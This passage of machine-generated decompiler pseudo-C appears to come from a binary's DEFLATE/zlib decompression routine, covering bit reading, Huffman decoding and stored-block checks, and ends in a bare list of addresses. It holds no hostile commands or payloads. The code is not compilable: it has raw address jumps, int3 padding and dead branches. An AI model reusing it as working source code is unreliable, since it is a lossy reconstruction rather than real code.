    																									_t2086 = 4 << 0;
    																									_t2465 =  *(_t2870 + 8);
    																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
    																									if(_t1903 ==  *(_t2870 - 0x10)) {
    																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
    																										_push( *(_t2870 + 8) + 0x2924);
    																										_push( *(_t2870 + 8) + 0x40);
    																										 *((intOrPtr*)( *0x001AC1F0))();
    																										_push( *( *(_t2870 + 8) + 0xbadbd9));
    																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
    																										_push( *(_t2870 + 8) + 0xbadbed);
    																										 *((intOrPtr*)( *((intOrPtr*)(0x1ac1f0))))();
    																										_t2873 = _t2873 + 0x18;
    																										goto L349;
    																									} else {
    																										L344:
    																										 *(_t2870 - 0x1c) = 0xffffffff;
    																										_t1692 =  *(_t2870 + 8);
    																										 *_t1692 = 0x15;
    																									}
    																								} else {
    																									L276:
    																									if( *(_t2870 - 8) >= 0xf) {
    																										L307:
    																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																										 *(_t2870 - 0x40) = _t2296;
    																										if( *(_t2870 - 0x40) < 0) {
    																											 *(_t2870 - 0x48) = 0xa;
    																											do {
    																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
    																												_t2296 =  *(_t2870 - 0x48) + 1;
    																												 *(_t2870 - 0x48) = _t2296;
    																											} while ( *(_t2870 - 0x40) < 0);
    																										} else {
    																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
    																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
    																										}
    																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
    																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
    																										 *(_t2870 - 0xc) = _t1900;
    																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
    																										 *(_t2870 - 8) = _t2086;
    																										_t2465 = 0;
    																										if(0 != 0) {
    																											goto L276;
    																										} else {
    																											if( *(_t2870 - 0x28) >= 0x10) {
    																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
    																													_t1937 =  *(_t2870 - 0x28);
    																													_t841 = _t1937 + 0x1ab004; // 0x70302
    																													_t2315 =  *_t841;
    																													 *(_t2870 - 0x24) = _t2315;
    																													L322:
    																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																														L336:
    																														goto 0x1b0b37;
    																														asm("int3");
    																														asm("int3");
    																														asm("int3");
    																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
    																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																														 *(_t2870 - 8) = _t1937;
    																														_t2315 = 0;
    																														if(0 != 0) {
    																															goto L322;
    																														} else {
    																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x1ab008)) +  *(_t2870 - 0x8c);
    																															if( *(_t2870 - 0x28) != 0x10) {
    																																 *(_t2870 - 0x108) = 0;
    																															} else {
    																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
    																															}
    																															_push( *(_t2870 - 0x8c));
    																															_push( *(_t2870 - 0x108));
    																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
    																															_t2666 = 4 << 0;
    																															 *((intOrPtr*)( *0x001AC1F4))();
    																															_t2873 = _t2873 + 0xc;
    																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
    																															goto L274;
    																														}
    																													} else {
    																														L323:
    																														_t1692 =  *(_t2870 - 4);
    																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																															goto L334;
    																														} else {
    																															L324:
    																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																															if(_t2086 == 0) {
    																																 *(_t2870 - 0xbc) = 0;
    																																L332:
    																																L334:
    																																if(0 != 0) {
    																																	goto L323;
    																																} else {
    																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																																	 *(_t2870 - 0xc) = _t1937;
    																																	_t2315 =  *(_t2870 - 8) + 8;
    																																	 *(_t2870 - 8) = _t2315;
    																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
    																																		goto L323;
    																																	} else {
    																																		goto L336;
    																																	}
    																																}
    																															} else {
    																																L325:
    																																 *(_t2870 - 0x1c) = 1;
    																																_t2465 =  *(_t2870 + 8);
    																																 *_t2465 = 0x12;
    																															}
    																														}
    																													}
    																												} else {
    																													L318:
    																													 *(_t2870 - 0x1c) = 0xffffffff;
    																													_t1692 =  *(_t2870 + 8);
    																													 *_t1692 = 0x11;
    																												}
    																											} else {
    																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
    																												_t2666 =  *(_t2870 - 0x10) + 1;
    																												 *(_t2870 - 0x10) = _t2666;
    																												goto L274;
    																											}
    																										}
    																									} else {
    																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																											goto L307;
    																										} else {
    																											L278:
    																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																											 *(_t2870 - 0x40) = _t2694;
    																											if( *(_t2870 - 0x40) < 0) {
    																												if( *(_t2870 - 8) <= 0xa) {
    																													goto L291;
    																												} else {
    																													 *(_t2870 - 0x48) = 0xa;
    																													do {
    																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
    																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
    																														_t2694 =  *(_t2870 - 0x48) + 1;
    																														 *(_t2870 - 0x48) = _t2694;
    																														if( *(_t2870 - 0x40) < 0) {
    																															goto L288;
    																														}
    																														break;
    																														L288:
    																														_t1900 =  *(_t2870 - 0x48) + 1;
    																													} while ( *(_t2870 - 8) >= _t1900);
    																													if( *(_t2870 - 0x40) < 0) {
    																														goto L291;
    																													} else {
    																														goto L304;
    																													}
    																												}
    																											} else {
    																												_t1900 =  *(_t2870 - 0x40) >> 9;
    																												 *(_t2870 - 0x48) = _t1900;
    																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
    																													L291:
    																													_t2086 =  *(_t2870 - 4);
    																													if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																														 *(_t2870 - 0xb4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																														 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																														goto L302;
    																													} else {
    																														L292:
    																														_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																														if(_t2465 == 0) {
    																															 *(_t2870 - 0xb4) = 0;
    																															L300:
    																															L302:
    																															if(0 != 0) {
    																																goto L291;
    																															} else {
    																																_t2086 =  *(_t2870 - 8);
    																																 *(_t2870 - 0xc) =  *(_t2870 - 0xb4) << _t2086 |  *(_t2870 - 0xc);
    																																_t1900 =  *(_t2870 - 8) + 8;
    																																 *(_t2870 - 8) = _t1900;
    																																if( *(_t2870 - 8) < 0xf) {
    																																	goto L278;
    																																} else {
    																																	goto L304;
    																																}
    																															}
    																														} else {
    																															L293:
    																															 *(_t2870 - 0x1c) = 1;
    																															_t1692 =  *(_t2870 + 8);
    																															 *_t1692 = 0x10;
    																														}
    																													}
    																												} else {
    																													L304:
    																													goto L307;
    																												}
    																											}
    																										}
    																									}
    																								}
    																							}
    																						} else {
    																							L244:
    																							 *(_t2870 - 0x1c) = 0xffffffff;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x23;
    																						}
    																					}
    																				}
    																			} else {
    																				L165:
    																				 *(_t2870 - 0x1c) = 0xffffffff;
    																				_t2465 =  *(_t2870 + 8);
    																				 *_t2465 = 0xa;
    																			}
    																		} else {
    																			L64:
    																			if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
    																				L78:
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
    																				_t2018 =  *(_t2870 - 8) & 0x00000007;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) - _t2018;
    																				if(0 != 0) {
    																					goto L64;
    																				} else {
    																					 *(_t2870 - 0x10) = 0;
    																					L81:
    																					if( *(_t2870 - 0x10) >= 4) {
    																						 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x2920 + _t2018 * 0) & 0x000000ff | ( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff) << 0x00000008;
    																						_t2465 =  *(_t2870 + 8);
    																						_t1692 = ( *(_t2465 + 0x2923) & 0x000000ff) << 8;
    																						if( *(_t2870 - 0x10) == (( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff | _t1692) ^ 0x0000ffff)) {
    																							L117:
    																							if( *(_t2870 - 0x10) == 0 ||  *(_t2870 - 8) == 0) {
    																								L139:
    																								if( *(_t2870 - 0x10) == 0) {
    																									goto L531;
    																								} else {
    																									L140:
    																									_t1692 =  *(_t2870 - 0x14);
    																									if(_t1692 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																										L144:
    																										_t1692 =  *(_t2870 - 4);
    																										if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																											if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
    																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																											} else {
    																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    																											}
    																											if( *((intOrPtr*)(_t2870 - 0x104)) >=  *(_t2870 - 0x10)) {
    																												 *(_t2870 - 0x100) =  *(_t2870 - 0x10);
    																											} else {
    																												if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
    																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																												} else {
    																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    																												}
    																												 *(_t2870 - 0x100) =  *(_t2870 - 0xfc);
    																											}
    																											 *(_t2870 - 0x94) =  *(_t2870 - 0x100);
    																											_push( *(_t2870 - 0x94));
    																											_push( *(_t2870 - 4));
    																											_push( *(_t2870 - 0x14));
    																											 *((intOrPtr*)( *((intOrPtr*)(0x1ac1f0))))();
    																											_t2873 = _t2873 + 0xc;
    																											 *(_t2870 - 4) =  *(_t2870 - 4) +  *(_t2870 - 0x94);
    																											_t2465 =  *(_t2870 - 0x14) +  *(_t2870 - 0x94);
    																											 *(_t2870 - 0x14) = _t2465;
    																											 *(_t2870 - 0x10) =  *(_t2870 - 0x10) -  *(_t2870 - 0x94);
    																											goto L139;
    																										} else {
    																											_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																											if(_t2086 == 0) {
    																												L149:
    																												 *(_t2870 - 0x1c) = 0xffffffff;
    																												_t2086 =  *(_t2870 + 8);
    																												 *_t2086 = 0x28;
    																											} else {
    																												L146:
    																												 *(_t2870 - 0x1c) = 1;
    																												_t2465 =  *(_t2870 + 8);
    																												 *_t2465 = 0x26;
    																											}
    																										}
    																									} else {
    																										L141:
    																										 *(_t2870 - 0x1c) = 2;
    																										_t2086 =  *(_t2870 + 8);
    																										 *_t2086 = 9;
    																									}
    																								}
    																							} else {
    																								L119:
    																								if( *(_t2870 - 8) >= 8) {
    																									L133:
    																									 *(_t2870 - 0x28) =  *(_t2870 - 0xc) & 0x000000ff;
    																									 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																									 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																									_t2086 = 0;
    																									if(0 != 0) {
    																										goto L119;
    																									} else {
    																										L134:
    																										_t2465 =  *(_t2870 - 0x14);
    																										if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																											 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x28);
    																											 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    																											_t2465 =  *(_t2870 - 0x10) - 1;
    																											 *(_t2870 - 0x10) = _t2465;
    																											goto L117;
    																										} else {
    																											L135:
    																											 *(_t2870 - 0x1c) = 2;
    																											_t1692 =  *(_t2870 + 8);
    																											 *_t1692 = 0x34;
    																										}
    																									}
    																								} else {
    																									L120:
    																									_t2086 =  *(_t2870 - 4);
    																									if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																										 *(_t2870 - 0xb8) =  *( *(_t2870 - 4)) & 0x000000ff;
    																										 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																										goto L131;
    																									} else {
    																										L121:
    																										_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																										if(_t2465 == 0) {
    																											 *(_t2870 - 0xb8) = 0;
    																											L129:
    																											L131:
    																											if(0 != 0) {
    																												goto L120;
    																											} else {
    																												 *(_t2870 - 0xc) =  *(_t2870 - 0xb8) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																												 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																												if( *(_t2870 - 8) < 8) {
    																													goto L120;
    																												} else {
    																													goto L133;
    																												}
    																											}
    																										} else {
    																											L122:
    																											 *(_t2870 - 0x1c) = 1;
    																											_t1692 =  *(_t2870 + 8);
    																											 *_t1692 = 0x33;
    																										}
    																									}
    																								}
    																							}
    																						} else {
    																							L114:
    																							 *(_t2870 - 0x1c) = 0xffffffff;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x27;
    																						}
    																					} else {
    																						if( *(_t2870 - 8) == 0) {
    																							L99:
    																							_t1692 =  *(_t2870 - 4);
    																							if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																								 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) =  *( *(_t2870 - 4));
    																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																								goto L110;
    																							} else {
    																								L100:
    																								_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																								if(_t2086 == 0) {
    																									 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) = 0;
    																									L108:
    																									L110:
    																									if(0 != 0) {
    																										goto L99;
    																									} else {
    																										goto L111;
    																									}
    																								} else {
    																									L101:
    																									 *(_t2870 - 0x1c) = 1;
    																									_t2465 =  *(_t2870 + 8);
    																									 *_t2465 = 7;
    																								}
    																							}
    																						} else {
    																							L83:
    																							if( *(_t2870 - 8) >= 8) {
    																								L97:
    																								 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) =  *(_t2870 - 0xc) & 0x000000ff;
    																								 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																								 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																								if(0 != 0) {
    																									goto L83;
    																								} else {
    																									L111:
    																									_t2018 =  *(_t2870 - 0x10) + 1;
    																									 *(_t2870 - 0x10) = _t2018;
    																									goto L81;
    																								}
    																							} else {
    																								L84:
    																								_t2086 =  *(_t2870 - 4);
    																								if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																									 *(_t2870 - 0xec) =  *( *(_t2870 - 4)) & 0x000000ff;
    																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																									goto L95;
    																								} else {
    																									L85:
    																									_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																									if(_t2465 == 0) {
    																										 *(_t2870 - 0xec) = 0;
    																										L93:
    																										L95:
    																										if(0 != 0) {
    																											goto L84;
    																										} else {
    																											 *(_t2870 - 0xc) =  *(_t2870 - 0xec) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																											if( *(_t2870 - 8) < 8) {
    																												goto L84;
    																											} else {
    																												goto L97;
    																											}
    																										}
    																									} else {
    																										L86:
    																										 *(_t2870 - 0x1c) = 1;
    																										_t1692 =  *(_t2870 + 8);
    																										 *_t1692 = 6;
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																			} else {
    																				L65:
    																				_t2465 =  *(_t2870 - 4);
    																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xb0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L76;
    																				} else {
    																					L66:
    																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t1692 == 0) {
    																						 *(_t2870 - 0xb0) = 0;
    																						L74:
    																						L76:
    																						if(0 != 0) {
    																							goto L65;
    																						} else {
    																							 *(_t2870 - 0xc) =  *(_t2870 - 0xb0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																							if( *(_t2870 - 8) < ( *(_t2870 - 8) & 0x00000007)) {
    																								goto L65;
    																							} else {
    																								goto L78;
    																							}
    																						}
    																					} else {
    																						L67:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t2086 =  *(_t2870 + 8);
    																						 *_t2086 = 5;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	L49:
    																	_t2465 =  *(_t2870 - 4);
    																	if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																		 *(_t2870 - 0xe4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																		goto L60;
    																	} else {
    																		L50:
    																		_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																		if(_t1692 == 0) {
    																			 *(_t2870 - 0xe4) = 0;
    																			L58:
    																			L60:
    																			if(0 != 0) {
    																				goto L49;
    																			} else {
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xe4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																				if( *(_t2870 - 8) < 3) {
    																					goto L49;
    																				} else {
    																					goto L62;
    																				}
    																			}
    																		} else {
    																			L51:
    																			 *(_t2870 - 0x1c) = 1;
    																			_t2086 =  *(_t2870 + 8);
    																			 *_t2086 = 3;
    																		}
    																	}
    																}
    															} else {
    																_t2086 =  *(_t2870 + 0x20) & 0x00000001;
    																if(_t2086 == 0) {
    																	L581:
    																	 *(_t2870 - 0x1c) = 0;
    																	_t2465 =  *(_t2870 + 8);
    																	 *_t2465 = 0x22;
    																} else {
    																	L533:
    																	if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
    																		L547:
    																		 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
    																		_t2086 =  *(_t2870 - 8) & 0x00000007;
    																		 *(_t2870 - 8) =  *(_t2870 - 8) - _t2086;
    																		_t1692 = 0;
    																		if(0 != 0) {
    																			goto L533;
    																		} else {
    																			 *(_t2870 - 0x10) = 0;
    																			L550:
    																			if( *(_t2870 - 0x10) >= 4) {
    																				goto L581;
    																			} else {
    																				if( *(_t2870 - 8) == 0) {
    																					L568:
    																					_t2465 =  *(_t2870 - 4);
    																					if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																						 *(_t2870 - 0x90) =  *( *(_t2870 - 4)) & 0x000000ff;
    																						 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																						goto L579;
    																					} else {
    																						L569:
    																						_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																						if(_t1692 == 0) {
    																							 *(_t2870 - 0x90) = 0;
    																							L577:
    																							L579:
    																							if(0 != 0) {
    																								goto L568;
    																							} else {
    																								goto L580;
    																							}
    																						} else {
    																							L570:
    																							 *(_t2870 - 0x1c) = 1;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x2a;
    																						}
    																					}
    																				} else {
    																					L552:
    																					if( *(_t2870 - 8) >= 8) {
    																						L566:
    																						 *(_t2870 - 0x90) =  *(_t2870 - 0xc) & 0x000000ff;
    																						 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																						 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																						if(0 != 0) {
    																							goto L552;
    																						} else {
    																							L580:
    																							_t1692 =  *( *(_t2870 + 8) + 0x10) << 0x00000008 |  *(_t2870 - 0x90);
    																							 *( *(_t2870 + 8) + 0x10) = _t1692;
    																							_t2086 =  *(_t2870 - 0x10) + 1;
    																							 *(_t2870 - 0x10) = _t2086;
    																							goto L550;
    																						}
    																					} else {
    																						L553:
    																						_t2465 =  *(_t2870 - 4);
    																						if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																							 *(_t2870 - 0xac) =  *( *(_t2870 - 4)) & 0x000000ff;
    																							 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																							goto L564;
    																						} else {
    																							L554:
    																							_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																							if(_t1692 == 0) {
    																								 *(_t2870 - 0xac) = 0;
    																								L562:
    																								L564:
    																								if(0 != 0) {
    																									goto L553;
    																								} else {
    																									 *(_t2870 - 0xc) =  *(_t2870 - 0xac) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																									 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																									if( *(_t2870 - 8) < 8) {
    																										goto L553;
    																									} else {
    																										goto L566;
    																									}
    																								}
    																							} else {
    																								L555:
    																								 *(_t2870 - 0x1c) = 1;
    																								_t2086 =  *(_t2870 + 8);
    																								 *_t2086 = 0x29;
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	} else {
    																		L534:
    																		_t1692 =  *(_t2870 - 4);
    																		if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																			 *(_t2870 - 0xa8) =  *( *(_t2870 - 4)) & 0x000000ff;
    																			 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																			goto L545;
    																		} else {
    																			L535:
    																			_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																			if(_t2086 == 0) {
    																				 *(_t2870 - 0xa8) = 0;
    																				L543:
    																				L545:
    																				if(0 != 0) {
    																					goto L534;
    																				} else {
    																					 *(_t2870 - 0xc) =  *(_t2870 - 0xa8) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																					 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																					if( *(_t2870 - 8) < ( *(_t2870 - 8) & 0x00000007)) {
    																						goto L534;
    																					} else {
    																						goto L547;
    																					}
    																				}
    																			} else {
    																				L536:
    																				 *(_t2870 - 0x1c) = 1;
    																				_t2465 =  *(_t2870 + 8);
    																				 *_t2465 = 0x20;
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												} else {
    													goto L352;
    												}
    											}
    										} else {
    											goto L503;
    										}
    									} else {
    										goto L504;
    									}
    								}
    								goto L600;
    							case 0x21:
    								goto L584;
    						}
    					}
    					L600:
    					goto 0x1b0d42;
    					asm("int3");
    					 *(_t2465 + 4) = _t1692;
    					goto L601;
    				}
    				L622:
    				return _t1688;
    			}









    0x001a38cc
    0x001a38cc
    0x001a38f4
    0x001a3900
    0x001a3906
    0x001a3909
    0x001a38f1
    0x001a38f1
    0x001a3bad
    0x001a3bbe
    0x001a3bc5
    0x00000000
    0x001a3bcb
    0x001a3bdc
    0x001a3bdf
    0x001a3be1
    0x001a3be9
    0x001a3bf8
    0x001a3bfd
    0x001a3c02
    0x001a3c0d
    0x001a3c1c
    0x001a3c21
    0x001a3c26
    0x001a3c31
    0x001a3c40
    0x001a3c42
    0x001a3c45
    0x001a3c57
    0x001a3c85
    0x001a3c54
    0x001a3c54
    0x001a3c8e
    0x001a3c98
    0x001a3ca7
    0x001a3caa
    0x001a3cba
    0x001a3cbd
    0x001a3cc8
    0x001a3cda
    0x001a3cf0
    0x001a3d08
    0x001a3d0e
    0x001a3d17
    0x001a3cd4
    0x001a3cd7
    0x001a3cd7
    0x001a3d2a
    0x001a3d59
    0x001a3d60
    0x001a3d72
    0x001a3d7b
    0x001a3d82
    0x00000000
    0x00000000
    0x001a3d88
    0x001a3d98
    0x001a3d9f
    0x001a3dad
    0x001a3dbd
    0x001a3dc3
    0x001a3dca
    0x001a3dcd
    0x001a3df2
    0x001a3e09
    0x001a3e0b
    0x001a3ddb
    0x001a3dde
    0x001a3dec
    0x001a3dec
    0x001a3e14
    0x001a3e6e
    0x001a3e75
    0x001a3e86
    0x001a3e91
    0x001a3e9a
    0x001a3e9a
    0x001a3ea3
    0x001a3ea9
    0x001a3ec0
    0x001a3ece
    0x001a3edc
    0x001a3ef1
    0x001a3f28
    0x001a3ef3
    0x001a3eff
    0x001a3f0a
    0x001a3f13
    0x001a3f13
    0x001a3eba
    0x001a3eba
    0x001a3f32
    0x001a3f40
    0x001a3f4f
    0x001a3e16
    0x001a3e1f
    0x001a3e26
    0x001a3e2f
    0x001a3e34
    0x001a3e3c
    0x001a3e49
    0x001a3e4e
    0x001a3e51
    0x001a3e51
    0x001a3e56
    0x00000000
    0x001a3da1
    0x001a3d69
    0x001a3d6f
    0x00000000
    0x001a3d6f
    0x00000000
    0x001a3d9f
    0x001a3f63
    0x001a445e
    0x001a3bb5
    0x001a3bbb
    0x00000000
    0x001a3f69
    0x001a3f69
    0x001a3f70
    0x001a3f87
    0x001a3f8a
    0x001a3f91
    0x001a439a
    0x001a43a4
    0x001a43a7
    0x001a43ae
    0x001a43e3
    0x001a43ed
    0x001a43fd
    0x001a440c
    0x001a4420
    0x001a443a
    0x001a444a
    0x001a4459
    0x001a445b
    0x00000000
    0x001a43b0
    0x001a43b0
    0x001a43b0
    0x001a43b7
    0x001a43ba
    0x001a5289
    0x001a3f97
    0x001a3f97
    0x001a3f9b
    0x001a4136
    0x001a414c
    0x001a4154
    0x001a415b
    0x001a4173
    0x001a417a
    0x001a41a2
    0x001a41a8
    0x001a41ab
    0x001a41ae
    0x001a415d
    0x001a4163
    0x001a416e
    0x001a416e
    0x001a41b7
    0x001a41c0
    0x001a41c2
    0x001a41c8
    0x001a41cb
    0x001a41ce
    0x001a41d0
    0x00000000
    0x001a41d6
    0x001a41da
    0x001a41fd
    0x001a4229
    0x001a422c
    0x001a422c
    0x001a4233
    0x001a4236
    0x001a423c
    0x001a42e0
    0x001a42e0
    0x001a42e5
    0x001a42e6
    0x001a42e7
    0x001a42f0
    0x001a42fe
    0x001a4304
    0x001a4307
    0x001a430a
    0x001a430c
    0x00000000
    0x001a4312
    0x001a4322
    0x001a432c
    0x001a4343
    0x001a432e
    0x001a433b
    0x001a433b
    0x001a4353
    0x001a435a
    0x001a4368
    0x001a436e
    0x001a4377
    0x001a4379
    0x001a4385
    0x00000000
    0x001a4385
    0x001a4242
    0x001a4242
    0x001a4242
    0x001a4248
    0x001a42a7
    0x001a42b3
    0x00000000
    0x001a424a
    0x001a424a
    0x001a424d
    0x001a4250
    0x001a4291
    0x001a429f
    0x001a42b6
    0x001a42b8
    0x00000000
    0x001a42ba
    0x001a42c5
    0x001a42c8
    0x001a42ce
    0x001a42d1
    0x001a42da
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a42da
    0x001a4252
    0x001a4252
    0x001a4252
    0x001a4259
    0x001a425c
    0x001a528b
    0x001a4250
    0x001a4248
    0x001a4205
    0x001a4205
    0x001a4205
    0x001a420c
    0x001a420f
    0x001a528d
    0x001a41dc
    0x001a41e5
    0x001a41ee
    0x001a41f1
    0x00000000
    0x001a41f1
    0x001a41da
    0x001a3fa1
    0x001a3faa
    0x001a411a
    0x001a4121
    0x001a412a
    0x001a4133
    0x00000000
    0x001a3fb0
    0x001a3fb0
    0x001a3fc7
    0x001a3fcf
    0x001a3fd6
    0x001a3ffa
    0x00000000
    0x001a3ffc
    0x001a3ffc
    0x001a4003
    0x001a4021
    0x001a402b
    0x001a4031
    0x001a4034
    0x001a403b
    0x00000000
    0x00000000
    0x00000000
    0x001a403d
    0x001a4040
    0x001a4043
    0x001a404c
    0x00000000
    0x001a404e
    0x00000000
    0x001a404e
    0x001a404c
    0x001a3fd8
